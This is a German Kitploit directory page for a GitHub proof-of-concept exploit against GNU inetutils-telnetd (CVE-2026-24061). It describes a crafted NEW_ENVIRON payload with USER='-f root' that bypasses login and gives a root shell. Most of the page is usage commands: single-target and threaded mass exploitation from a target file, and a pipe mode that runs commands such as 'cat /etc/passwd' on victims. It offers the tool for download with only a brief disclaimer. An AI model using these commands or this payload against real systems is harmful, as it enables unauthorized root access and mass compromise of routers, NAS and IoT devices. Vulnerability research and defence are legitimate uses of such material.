Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061-PoC-Exploit — Remote-Authentifizierungs-Bypass-Exploit für GNU inetutils-telnetd (CVE-2026-24061) mittels CRLF-Injection, um eine sofortige Root-Shell zu erlangen. Unterstützt Einzel-/Massen-Exploitation, Multi-Threading, benutzerdefinierte Ports, Pipe-Modus und Sitzungs-Keep-Alive. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
SchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Remote-Authentifizierungs-Bypass-Exploit für GNU inetutils-telnetd (CVE-2026-24061) mittels CRLF-Injection, um eine sofortige Root-Shell zu erlangen. Unterstützt Einzel-/Massen-Exploitation, Multi-Threading, benutzerdefinierte Ports, Pipe-Modus und Sitzungs-Keep-Alive.

Repository anzeigen
64vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061

🚀 CVE-2026-24061 - GNU inetutils-telnetd Authentifizierungs-Bypass-Exploit

Python Bash License CVSS

GNU inetutils-telnetd-Edition - CRLF-Injection zum Authentifizierungs-Bypass & sofortige Root-Shell

📌 Übersicht

Dieser Exploit nutzt CVE-2026-24061 aus, eine kritische Schwachstelle für Remote-Authentifizierungs-Bypass in GNU inetutils-telnetd. Durch das Injizieren eines präparierten NEW_ENVIRON-Payloads mit USER='-f root' wird die Authentifizierung umgangen und eine sofortige Root-Shell ohne jegliche Anmeldedaten gewährt.

Hinweis: Das Skript basic_exploit.sh ist eine vereinfachte, schnellere Version von exploit.sh; für den vollen Funktionsumfang wird jedoch exploit.sh empfohlen.

🔥 Hauptfunktionen

KategorieFunktionen
Ausnutzung✅ Authentifizierungs-Bypass per CRLF-Injection
✅ Sofortige Root-Shell
✅ Benutzerdefinierte Benutzer-Injection (-f admin, -f user)
Scannen✅ Exploitation einzelner Ziele
✅ Massen-Exploitation aus Datei
✅ Multithreading (konfigurierbare Threads)
✅ Unterstützung benutzerdefinierter Ports
Erweitert✅ Pipe-Modus (Befehlsausführung über stdin)
✅ Sitzungs-Keep-Alive
✅ Wiederholungsmechanismus
✅ Timeout-Steuerung
Benutzerfreundlichkeit✅ Farbige Ausgabe (colorama)
✅ Zweisprachig (Python & Bash)
✅ Ausführlicher/Debug-Modus

🎯 Verwundbare Versionen

ProduktVersionen
GNU inetutils-telnetd1.9.3 - 2.7
Betroffene Linux-DistributionenDebian, CentOS, Ubuntu und deren Distributionen. (Zorin OS, Linux Mint, Pop!_OS und Elementary OS)
Eingebettete GeräteNAS, IoT, Router

⚠️ Haftungsausschluss: Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unbefugter Zugriff ist illegal.

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ Verwendungsbeispiele

🎯 Exploitation eines einzelnen Ziels

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 Benutzerdefinierter Port und Benutzer

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 Massen-Exploitation (mehrere Ziele)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 Pipe-Modus (Befehlsausführung)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ Erweiterte Optionen

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 Kommandozeilenargumente

KurzLangBeschreibungStandard
-u--urlIP-Adresse des ZielsErforderlich
-p--portZielport23
-l--listDatei mit ZiellisteKeine
-m--max-threadsMaximale Threads für Massen-Exploitation10
-usr--usernameZu injizierender Benutzernameroot
-t--timeoutSocket-Timeout (Sekunden)10
-r--retriesAnzahl der Wiederholungsversuche3
-v--verboseDebug-Ausgabe aktivierenFalse
--keep-aliveSitzung nach der Exploitation aktiv haltenFalse

🔗 Verwandte Exploits

Schau dir meine anderen Exploit-Repositories an:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
Tool herunterladen